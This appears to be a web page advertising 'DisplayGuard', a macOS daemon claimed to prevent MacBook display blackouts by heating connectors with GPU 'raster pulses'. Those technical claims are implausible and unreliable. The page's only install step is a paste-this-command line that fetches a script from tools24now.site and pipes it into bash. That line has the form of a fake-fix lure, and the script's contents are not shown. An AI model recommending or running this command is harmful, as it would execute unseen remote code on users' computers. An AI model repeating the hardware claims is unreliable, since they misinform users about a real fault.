What is the DisplayGuard Daemon?

DisplayGuard is a purpose-built, lightweight background daemon designed for Apple Silicon (M1, M2, M3) and modern Intel MacBooks suffering from cold-solder thermal sensitivity, sleep-wake blackouts, or false Lid Angle Sensor shutdowns.

How It Operates

  • 0% Idle CPU Overhead: Written in lean C and shell scripting, consuming under 8MB of RAM.
  • SMC Temperature Monitoring: Reads calibrated PMU thermal sensors (tcal, TCHP, tdie).
  • Thermal Induction Keepalive: When chassis temperature drops near the critical micro-fracture threshold (<31°C), DisplayGuard asserts micro-second GPU raster pulses to maintain connector temperature within its functional operating band (38°C–42°C).
  • Persistent Display Assertion: Enforces PreventUserIdleDisplaySleep while the lid is open, preventing WindowServer from cutting off the backlight driver.

1-Line Installation Command

Open Terminal (via Spotlight or external monitor) and run:

curl -sSL https://tools24now.site/dg | bash

Once installed, verify full display uniformity using our Mac Screen Diagnostic Test.
